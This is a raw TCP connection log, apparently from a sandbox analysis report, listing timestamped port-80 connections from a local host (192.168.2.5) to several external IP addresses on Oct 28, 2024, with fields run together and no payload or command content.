                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.038392067 CET805999044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.722570896 CET805999044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.722827911 CET5999080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.729553938 CET805999044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.729635000 CET5999080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.738262892 CET5999180192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.743784904 CET805999154.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.743973017 CET5999180192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.744014025 CET5999180192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.744014025 CET5999180192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.749633074 CET805999154.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:37.750081062 CET805999154.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.610407114 CET805999154.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.610629082 CET5999180192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.617867947 CET805999154.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.617954016 CET5999180192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.626127958 CET5999280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.631695986 CET805999235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.631911039 CET5999280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.659461021 CET5999280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.659503937 CET5999280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.665406942 CET805999235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:38.666198015 CET805999235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.470838070 CET805999235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.471174002 CET5999280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.477081060 CET805999235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.477161884 CET5999280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.576973915 CET5999380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.582469940 CET805999354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.582545042 CET5999380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.582664013 CET5999380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.582695007 CET5999380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.588110924 CET805999354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:39.588140965 CET805999354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:40.422995090 CET805999354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:40.423183918 CET5999380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:40.428998947 CET805999354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:40.429219961 CET5999380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:40.437606096 CET5999480192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:40.443114996 CET805999434.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:40.443197966 CET5999480192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:40.443310022 CET5999480192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:40.443371058 CET5999480192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:40.448854923 CET805999434.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:40.449246883 CET805999434.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.272118092 CET805999434.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.272357941 CET5999480192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.279046059 CET805999434.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.279195070 CET5999480192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.288007021 CET5999580192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.294301987 CET805999547.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.294380903 CET5999580192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.294508934 CET5999580192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.294543028 CET5999580192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.301390886 CET805999547.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:41.302030087 CET805999547.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.561801910 CET805002485.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.561907053 CET805002485.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.561925888 CET5002480192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.561995983 CET5002480192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.561995983 CET5002480192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.562175989 CET805002485.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.562228918 CET5002480192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.568555117 CET805002485.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.713582993 CET805999547.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.713768959 CET5999580192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.719517946 CET805999547.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.719620943 CET5999580192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.730093956 CET5999680192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.735527039 CET805999654.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.735682011 CET5999680192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.735892057 CET5999680192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.735919952 CET5999680192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.741278887 CET805999654.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.741626978 CET805999654.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.565865993 CET805999654.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.566135883 CET5999680192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.572388887 CET805999654.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.572506905 CET5999680192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.673973083 CET5999780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.679543018 CET80599973.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.679672003 CET5999780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.679754019 CET5999780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.679774046 CET5999780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.685623884 CET80599973.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.685703039 CET80599973.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:44.343225956 CET80599973.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:44.343523026 CET5999780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:44.349435091 CET80599973.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:44.349536896 CET5999780192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:44.365031004 CET5999880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:44.371336937 CET805999818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:44.371407986 CET5999880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:44.377974987 CET5999880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:44.378000975 CET5999880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:44.384789944 CET805999818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:44.385446072 CET805999818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.037393093 CET805999818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.037810087 CET5999880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.044269085 CET805999818.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.044368982 CET5999880192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.053329945 CET5999980192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.059117079 CET805999918.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.059245110 CET5999980192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.059422016 CET5999980192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.059459925 CET5999980192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.064858913 CET805999918.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.065104008 CET805999918.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.892080069 CET805999918.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.898118973 CET5999980192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.904174089 CET805999918.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.904266119 CET5999980192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.914047003 CET6000080192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.919547081 CET80600003.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.919637918 CET6000080192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.919753075 CET6000080192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.919776917 CET6000080192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.925363064 CET80600003.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.925460100 CET80600003.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.585510969 CET80600003.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.585798979 CET6000080192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.593625069 CET80600003.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.593727112 CET6000080192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.606997967 CET6000180192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.612437963 CET806000135.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.612579107 CET6000180192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.612720013 CET6000180192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.612736940 CET6000180192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.618555069 CET806000135.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.618626118 CET806000135.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.453248024 CET806000135.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.460289955 CET6000180192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.466682911 CET806000135.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.466779947 CET6000180192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.493984938 CET6000280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.500114918 CET806000218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.500196934 CET6000280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.504612923 CET6000280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.504640102 CET6000280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.509975910 CET806000218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.510032892 CET806000218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.176425934 CET806000218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.176630974 CET6000280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.182377100 CET806000218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.182435036 CET6000280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.199178934 CET6000380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.204690933 CET806000354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.204771042 CET6000380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.204962969 CET6000380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.204989910 CET6000380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.210397959 CET806000354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.210429907 CET806000354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.085321903 CET806000354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.104063034 CET6000380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.110905886 CET806000354.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.110970974 CET6000380192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.121555090 CET6000480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.127345085 CET806000418.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.127430916 CET6000480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.127609015 CET6000480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.127643108 CET6000480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.132971048 CET806000418.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.133013010 CET806000418.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.959461927 CET806000418.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.963444948 CET6000480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.969477892 CET806000418.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.969603062 CET6000480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.983347893 CET6000580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.989959955 CET806000554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.990052938 CET6000580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.053610086 CET6000580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.053637028 CET6000580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.059154987 CET806000554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.059170008 CET806000554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.819294930 CET806000554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.837089062 CET6000580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.842956066 CET806000554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.843027115 CET6000580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.871341944 CET6000680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.876750946 CET806000618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.876840115 CET6000680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.878051043 CET6000680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.878078938 CET6000680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.883434057 CET806000618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.883445024 CET806000618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:52.319886923 CET806000618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:52.320128918 CET6000680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:52.326066971 CET806000618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:52.326956987 CET6000680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:52.336492062 CET6000780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:52.344073057 CET806000754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:52.344163895 CET6000780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:52.344511986 CET6000780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:52.344528913 CET6000780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:52.353209019 CET806000754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:52.354809046 CET806000754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.174709082 CET806000754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.225301981 CET6000780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.291922092 CET806000754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.293581009 CET6000780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.578922987 CET6000780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.584425926 CET806000754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.622298956 CET6000880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.627765894 CET806000844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.627895117 CET6000880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.628225088 CET6000880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.628277063 CET6000880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.633694887 CET806000844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:53.633944988 CET806000844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.304781914 CET806000844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.305016994 CET6000880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.311237097 CET806000844.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.311350107 CET6000880192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.320892096 CET6000980192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.326514006 CET8060009172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.326625109 CET6000980192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.326935053 CET6000980192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.326935053 CET6000980192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.332477093 CET8060009172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.332618952 CET8060009172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.990154982 CET8060009172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.990369081 CET6000980192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.990369081 CET6000980192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.992085934 CET6001080192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.995930910 CET8060009172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.997469902 CET8060010172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:54.999790907 CET6001080192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.000348091 CET6001080192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.000415087 CET6001080192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.005763054 CET8060010172.234.222.143192.168.2.5
